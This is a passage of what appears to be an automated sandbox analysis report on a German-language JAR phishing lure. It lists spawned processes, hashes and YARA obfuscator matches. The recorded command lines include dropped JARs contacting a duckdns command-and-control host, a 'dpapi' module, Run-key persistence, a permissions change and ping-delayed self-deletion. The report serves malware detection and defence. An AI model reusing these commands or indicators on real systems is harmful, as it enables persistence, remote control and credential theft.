                                      Imagebase:0xac0000
                                      File size:289'792 bytes
                                      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205614657.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE
                                      Imagebase:0xcc0000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:5
                                      Start time:01:00:08
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\icacls.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                      Imagebase:0x2f0000
                                      File size:29'696 bytes
                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:01:00:08
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:01:00:22
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000003.1352312193.0000000001138000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:01:00:22
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:16
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                                      Imagebase:0xb50000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000003.2308395794.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2317473344.0000000014C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      Target ID:26
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      No disassembly